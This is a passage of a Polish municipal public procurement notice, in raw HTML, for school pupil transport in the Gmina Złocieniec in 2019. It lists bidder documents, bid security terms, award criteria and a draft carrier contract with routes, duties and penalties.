id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Tak</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1) Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp;2) licencja na wykonywanie zarobkowego transportu drogowego osób zgodnie z ustawą z dnia 6 września 2001r. o transporcie drogowym lub odpowiadające im równoważne dokument</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1)	Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; 2)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. 3)	Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami - wykaz pojazdów /autobusów/, którymi wykonawca świadczyć będzie dowóz uczniów wraz z informacją o podstawie dysponowania tymi zasobami4)	Dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Postanowienia dotyczące składania dokumentów przez Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej; 1)	Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o którym mowa w § 5 pkt 4 Rozporządzenia Ministra Rozwoju z dnia 27 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U. z 2016 r. poz. 1126); - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 2)	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się powyższego dokumentu, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby - wystawionych nie wcześniej niż w terminie jw. 3)	W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę, zamawiający może zwrócić się do właściwych organów kraju, w którym miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu. </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: a)	Zadanie częściowe nr 1 - 5 000,00 zł (słownie złotych: pięć tysięcy 00/100),b)	Zadanie częściowe nr 2 - 1 000,00 zł (słownie złotych: jeden tysiąc 00/100) 2	Wadium należy wnieść w formach przewidzianych w art. 45 ust. 6 ustawy, tj.:a)	pieniądzu,b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,c)	gwarancjach bankowych,d)	gwarancjach ubezpieczeniowych,e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).3	Wykonawca zobowiązany jest wnieść wadium w terminie składania ofert.4	Wadium w pieniądzu należy wnieść na konto Zamawiającego:Bank PKO S.A. BP Złocieniec Nr 38 1020 2847 0000 1102 0009 6719 . W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.5	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć w terminie do składania ofert w siedzibie Zamawiającego Urząd Miejski, ul. Stary Rynek 3, 78-520 Złocieniec w sekretariacie pok. 11 lub zamieścić w osobnej kopercie - opisanej ,,wadium". Kopię dołączyć do oferty.6	W przypadku, gdy wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać:a)	zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie zamawiającego (beneficjenta gwarancji) zawierające oświadczenie, że zaistniały przesłanki jego zatrzymania. b)	termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą,c)	miejsce i termin zwrotu gwarancji.7	Wadium wniesione w pieniądzu zamawiający przechowa na rachunku bankowym.8	Wykonawca, który nie zabezpieczy swojej oferty akceptowaną formą wadium zostanie przez zamawiającego wykluczony a jego oferta zostanie uznana za odrzuconą.9 W ofercie należy wpisać nr konta, na które zamawiający ma zwrócić wadium lub dołączyć do oferty upoważnienie do odbioru wadium przez wskazaną osobę.10	W zakresie wadium obowiązują uregulowania zawarte w art. 45 i 46 Ustawy Pzp.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Tak</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>wiek pojazdów przeznaczonych do realizacji zamówienia </TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">Zadanie częściowe nr 1Projekt Umowa Nr .............. zawarta w dniu ...................................... pomiędzy: Gminą Złocieniec mającą siedzibę w Złocieńcu, ul. Stary Rynek 3, zwaną w dalszej części Umowy ,,ZAMAWIAJĄCYM", za którą działa Burmistrz Złocieńca - Krzysztof Zacharzewski;a........................................................................................................................, zwany dalej ,,Przewoźnikiem".§ 1.1.	Zamawiający powierza a Przewoźnik przyjmuje do wykonania zamówienie pn: ,, Dowóz uczniów do szkół z terenu Gminy Złocieniec w roku 2019,, zgodnie z ofertą Przewoźnika złożoną dnia ....................... r. stanowiącą załącznik do umowy. 2.	Przedmiotem zamówienia jest świadczenie usługi polegającej na przewozie młodzieży szkolnej z miejscowości zgodnie z Załącznikiem do SIWZ do Szkoły Podstawowej Nr 1 w Złocieńcu przy ul. I Dywizji WP 4, Szkoły Podstawowej Nr 3 przy ul. Czwartaków 2 i Przedszkola w Złocieńcu przy ul. Orzeszkowej 2 i Okrzei 4 oraz do Szkoły Podstawowej w Nowym Worowie.3.	Przewoźnik zobowiązuje się do zatrudnienia na podstawie umowy o pracę przez siebie lub podwykonawcę osób wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia tj. kierowców pojazdów biorących udział w świadczeniu usługi na zasadach określonych w SIWZ stanowiącej integralną część niniejszej umowy.§ 2.Ustala się czas trwania umowy na okres 1.01.2019 r. do 31.12.2019 r.§ 3.1.	Przewóz uczniów odbywać się będzie na podstawie biletów miesięcznych szkolnych.2.	Zamawiający zobowiązuje się dostarczyć Przewoźnikowi zapotrzebowanie na bilety do dnia 25 każdego miesiąca poprzedzającego miesiąc, w którym ma być dokonany przewóz.3.	Ceny biletów miesięcznych na trasach wskazanych niżej wynoszą: Trasa	Cena 1 biletu miesięcznego brutto1.01.-31.12.2019r.Budowo-Bobrowo	Budowo-Wąsosz	Budowo-Sułoszyn	Budowo-Jadwiżyn	Budowo-Uraz	Budowo-Małobór	Budowo-Skąpe	Budowo-Stare Worowo	Budowo-Warniłęg	Budowo-Cieszyno	Budowo-Darskowo	Budowo-Kosobudy	Budowo-Rzęśnica	Budowo-Jarosław	Budowo-Lubieszewo	Budowo-Lubieszewo(Zatonie)	Budowo-Stawno	Budowo-Błędno	Budowo- Gronowo	Budowo- Śródlesie	Budowo - Siecino	Budowo - Drzeńsko	Budowo - Dobrosław	Złocieniec-Bobrowo	Złocieniec-Wąsosz	Złocieniec-Sułoszyn	Złocieniec-Jadwiżyn	Złocieniec-Jadwiżyn	Złocieniec-Uraz	Złocieniec-Małobór	Złocieniec-Skąpe	Złocieniec-Stare Worowo-	Złocieniec-Warniłęg	Złocieniec-Cieszyno	Złocieniec-Darskowo	Złocieniec-Kosobudy	Złocieniec-Rzęśnica	Złocieniec-Jarosław	Złocieniec-Lubieszewo	Złocieniec-Lubieszewo(Zatonie)	Złocieniec-Stawno	Złocieniec-Budowo	Złocieniec-Błędno	SP 1-Osiedle Pomorskie i Gronowskie	Złocieniec-Gronowo	Złocieniec-Siecino	Złocieniec-Dobrosław	Złocieniec-Śródlesie	Złocieniec-Drzeńsko	Nowe Worowo-Bolegorzyn	Nowe Worowo- Nowe Worowo kolonia	Nowe Worowo-Płocie	Nowe Worowo-Cieminko	Nowe Worowo-Smołdzęcino	Nowe Worowo-Chlebowo	Nowe-Worowo-Śmidziecino	Nowe Worowo-Szczycienko	Nowe Worowo-Grabinek	Nowe Worowo-Stare Worowo	Nowe Worowo-Warniłęg	Nowe Worowo-Skąpe	4.	Ceny zawierają podatek VAT oraz koszty opieki na każdym kierunku dowożenia.5.	Zapłata za przewóz następować będzie na podstawie faktur miesięcznych wystawionych przez Przewoźnika, przelewem bankowym na rachunek nr .................................... w terminie do 21 dni od otrzymania faktury, przy czym za dzień zapłaty uważa się dzień obciążenia rachunku bankowego Zamawiającego.6. Wyłącza się możliwość cesji wierzytelności wynikającej z niniejszej umowy.7.	Burmistrz informuje, że z dniem 1 lipca 2018 r. Gmina przystąpiła do mechanizmu podzielonej płatności w podatku od towarów i usług w związku z czym rachunek bankowy podany przez Przewoźnika do rozliczeń z niniejszej umowy musi być rachunkiem powiązanym z rachunkiem VAT.§ 4.1.	Przewoźnik zobowiązuje się do:1)	zapewnienia dowozu uczniów na trasach , o których mowa w SIWZ stanowiącej integralną część niniejszej umowy,2)	zapewnienia opieki w każdym pojeździe - opiekuna, którego zadaniem jest nadzór nad uczniami w czasie dowozu, wchodzenia i wychodzenia uczniów z pojazdu oraz przekazanie uczniów pod opiekę pracownikowi szkoły lub przedszkola, przy czym opiekunem nie może być kierowca,3)	zapewnienia, że kierowcy posiadać będą wymagane przepisami prawa uprawnienia, będą wyposażeni w identyfikatory oraz telefony komórkowe, 4)	zapewnienia, że pojazdy posiadać będą polisę OC i NNW dla wszystkich przewożonych osób, wszystkie wymagane przepisami prawa badania techniczne,5)	zapewnienia miejsc siedzących dla wszystkich uczniów,6)	niełączenia tras np. przewóz z Cieszyna przez Darskowo,7)	zapewnienia transportu zastępczego w razie awarii pojazdu,2.	Przewoźnik ponosi całkowitą odpowiedzialność za szkody, które wynikną z ruchu pojazdów i przewozu uczniów, przy uwzględnieniu obowiązujących zasad wynikających z obowiązku ubezpieczenia odpowiedzialności cywilnej.3.	Przewoźnik ustali w terminie do 31.12.2018 r. z dyrektorami szkół, przedszkoli, których dotyczy dowóz, rozkłady jazdy na poszczególnych kierunkach.§ 5.Przewoźnik zwolniony jest od odpowiedzialności za zawieszenie lub opóźnienie kursu, spowodowane siła wyższą, w szczególności przez gołoledź, nieprzejezdność dróg.§ 6.1.	Przewoźnik zapłaci Zamawiającemu kary umowne:1)	za nieprzestrzeganie rozkładu jazdy w wysokości 0,5 % łącznego wynagrodzenia umownego brutto za poprzedni miesiąc za każdy dzień nienależytej realizacji umowy;2) za każdy przypadek niewłaściwej realizacji umowy w innym przypadku niż opisane w pkt1 w wysokości 0,5 % łącznego wynagrodzenia umownego brutto za poprzedni miesiąc za każdy dzień nienależytej realizacji umowy;3) za odstąpienie od umowy, w całości lub w części, z przyczyn leżących po stronie Przewoźnika w wysokości 10 % łącznego wynagrodzenia umownego brutto za ostatni miesiąc;4) w przypadku braku zatrudnienia na podstawie umowy o pracę osób, o których mowa w §1 ust. 3 lub nieprzedstawienia dowodów potwierdzających ich zatrudnienie - w wysokości 200,00 zł od każdego stwierdzonego przypadku,2.	Przewoźnik wyraża zgodę na potrącanie kar umownych z przysługującego mu wynagrodzenia.3. Zamawiający zastrzega sobie prawo dochodzenia odszkodowania uzupełniającego ponad kwoty określone w ust. 1w przypadku, gdy szkoda z tytułu niewykonania lub nienależytego wykonania usługi przekroczy kwotę kar umownych. 4. Przewoźnik wyraża zgodę na dokonywanie kontroli przewozu przez Zamawiającego bez uprzedzenia. § 7.1.	Umowa może zostać rozwiązana w każdym czasie za zgodnym porozumieniem stron.2.	Rozwiązanie umowy może nastąpić za jednostronnym 3-miesięcznym wypowiedzeniem, z tym że nie może być rozwiązana w trakcie roku szkolnego.3.	Stronom przysługuje prawo rozwiązania umowy bez zachowania okresu wypowiedzenia w przypadku nie wywiązywania się ze zobowiązań przez jedną ze stron.§ 8.Wszelkie zmiany i uzupełnienie treści niniejszej umowy możliwe będę tylko w przypadkach określonych w Rozdziale 16 SIWZ, przy czym ich wprowadzenie wymaga spisania aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności. § 9.1.	Wszelkie spory na tle wykonywania postanowień niniejszej umowy strony będą starały się rozwiązać polubownie. W przypadku braku porozumienia spory będzie rozstrzygał sąd właściwy dla siedziby Zamawiającego.2.	Informacja o przetwarzaniu danych osobowych Przewoźnika będącego osobą fizyczną zawarta jest na stronach BIP Zamawiającego.§ 10.W sprawach nieuregulowanych niniejszą umową stosuje się przepisy prawa cywilnego i przewozowego.§ 